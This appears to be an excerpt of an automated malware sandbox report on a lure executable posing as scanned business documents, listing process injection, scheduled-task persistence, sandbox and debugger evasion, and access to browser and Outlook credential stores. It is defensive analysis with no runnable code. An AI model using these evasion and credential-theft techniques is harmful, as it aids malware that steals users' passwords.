            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_002F648E
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_002842A2
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeFile created: C:\Users\user\AppData\Local\Temp\aut8DF2.tmpJump to behavior
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: schtasks.exe, 00000004.00000003.2132258757.0000000003190000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2132042421.0000000003170000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeReversingLabs: Detection: 71%
            Source: unknownProcess created: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"Jump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic file information: File size 1261056 > 1048576
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MHFAGZiftf.exe, 00000003.00000002.4110802051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021295588.000000000021E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002842DE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A0A76 push ecx; ret 0_2_002A0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040209E push esp; ret 1_2_004020A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004050AF push 660EA6FEh; ret 1_2_004050B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004121DC push ebp; retf 1_2_004121F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004121DC push ecx; iretd 1_2_0041222E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004019E0 push esp; ret 1_2_00401A04
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412210 push ecx; iretd 1_2_0041222E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E2B4 push ss; ret 1_2_0041E2C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E36A push edx; iretd 1_2_0041E372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D48B pushfd ; ret 1_2_0040D48F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004145F7 push eax; iretd 1_2_00414687
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00419D8E push ss; ret 1_2_00419D8F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A5AB push ss; retf 1_2_0041A645
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403660 push eax; ret 1_2_00403662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004076F8 push edi; retf 1_2_0040771F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx1_2_03C309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0283D push eax; iretd 1_2_03C02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01368 push eax; iretd 1_2_03C01369
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01065 push edi; ret 1_2_03C0108A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E91366 pushfd ; ret 3_2_03E9136A
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03EA2245 push edx; iretd 3_2_03EA224D
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03EA218F push ss; ret 3_2_03EA21A0
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E960EB push ecx; iretd 3_2_03E96109
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E960B7 push ebp; retf 3_2_03E960D1
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E960B7 push ecx; iretd 3_2_03E96109
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E88F8A push 660EA6FEh; ret 3_2_03E88F8F
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03EA6F0D push 195B6DB7h; iretd 3_2_03EA6F14
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 3_2_03E8B5E5 push edi; retf 3_2_03E8B5FA
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeFile created: \scanned docs from emnes metal sdn bhd_.exe
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeFile created: \scanned docs from emnes metal sdn bhd_.exeJump to behavior

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0029F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0029F98E
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_00311C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00311C41
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96192
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeAPI/Special instruction interceptor: Address: 3203234
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
            Source: C:\Windows\SysWOW64\schtasks.exeWindow / User API: threadDelayed 9780Jump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeAPI coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exeAPI coverage: 2.3 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000Thread sleep count: 192 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000Thread sleep time: -384000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000Thread sleep count: 9780 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 5000Thread sleep time: -19560000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968Thread sleep time: -51000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe TID: 6968Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_002EDBBE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F68EE FindFirstFileW,FindClose,0_2_002F68EE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_002F698F
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002ED076
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002ED3A9
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002F9642
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002F979D
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_002F9B2B
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_002F5C97
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B2BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_02B2BAB0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002842DE
            Source: MHFAGZiftf.exe, 00000007.00000002.4111361762.000000000065F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2244405329.000002308191C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417783 LdrLoadDll,1_2_00417783
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002FEAA2 BlockInput,0_2_002FEAA2
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002B2622
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002842DE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A4CE8 mov eax, dword ptr fs:[00000030h]0_2_002A4CE8
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_03203500 mov eax, dword ptr fs:[00000030h]0_2_03203500
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_032034A0 mov eax, dword ptr fs:[00000030h]0_2_032034A0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_03201E70 mov eax, dword ptr fs:[00000030h]0_2_03201E70
